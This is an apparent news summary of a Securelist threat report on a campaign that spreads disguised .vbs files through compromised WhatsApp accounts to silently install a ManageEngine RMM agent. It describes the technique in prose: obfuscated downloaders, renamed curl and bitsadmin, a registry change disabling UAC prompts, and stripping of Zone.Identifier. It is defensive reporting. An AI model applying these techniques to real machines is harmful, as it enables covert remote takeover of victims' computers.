80% of the victims are in Malaysia, and the attackers are using nothing more exotic than VBScript files sent through WhatsApp Desktop and Web. Kaspersky's Securelist team published a detailed breakdown of a campaign active since June 2026 that compromises WhatsApp accounts and sends financial-themed .vbs attachments to the victim's contact list. WhatsApp Desktop is the preferred delivery path. Clicking the attachment in the chat spawns WScript.exe directly from WhatsApp.Root.exe, with the script sitting in the app's attachment storage directory. On WhatsApp Web, the user has to open the downloaded file from the Downloads folder, making Desktop the easier infection vector. No accompanying text in the messages - just the file. The attacker likely gained access to multiple WhatsApp accounts; the exact compromise method remains unknown.
The Three-Stage Infection Chain Stage 1 is a VBScript masquerading as a business document - "Debt Statement.vbs", "Billing Statement (2).vbs", even localized versions in Portuguese, Malay, and German. The script creates a working directory under C:\Users\Public\Documents\ with random names like Temp_ or MSUpdate_, sets hidden and system attributes, and downloads two secondary VBS payloads. Obfuscation is heavy: string concatenation, encoded code, randomized variable names, and junk content. Some variants copy curl.exe and bitsadmin.exe into the working directory, renaming them to DLL-like names before using them to fetch the next stage. Stage 2 consists of two scripts. The first repeatedly tries to set HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin to 0 - disabling UAC prompts - using ShellExecute with the runas verb in a loop. The second downloads a ZIP archive from attacker-controlled infrastructure, extracts it via Shell.Application COM, strips Zone.Identifier ADS to avoid security warnings, and launches the embedded setup1.vbs. Stage 3 unpacks a preconfigured ManageEngine Endpoint Central agent package: the MSI installer, server configuration (DCAgentServerInfo.json), certificates, and an installation script. The setup1.vbs silently runs msiexec.exe with the supplied config, installing the RMM agent without any visible UI. One variant even placed a fake "Income Tax Return Form.vbs" alongside the installer files to trick the user into running it.
Attribution Clues and Infrastructure Overlaps Endpoint Central management servers were found at IPs like 202.61.160 201 - an address previously tied to ValleyRAT and Gh0st RAT command-and-control infrastructure. The VBScript samples contain simplified Chinese comments referencing Windows Update modules and certificate validation, suggesting a Chinese-speaking operator. But Kaspersky rates attribution as low confidence; the overlaps could be shared hosting or reused infrastructure. The campaign is broad and opportunistic, hitting Malaysia, Brazil, India, Mexico, Singapore, UK, Spain, Taiwan, Australia, Russia, and Vietnam. No specific organization targeting - just consumers who receive an unexpected .vbs from a known contact and click it. What this means: legitimate RMM tools are the new backdoor. ManageEngine Endpoint Central is enterprise software designed for remote administration, but once installed, the attacker has persistent, silent access. Expect more campaigns to abuse built-in Windows scripting hosts and messaging platforms to drop trusted admin tools - and watch for .vbs attachments even from contacts you trust.
Source: A VBScript campaign distributed through WhatsApp deploying RMM software
Domain: securelist.com
Comments load interactively on the live page.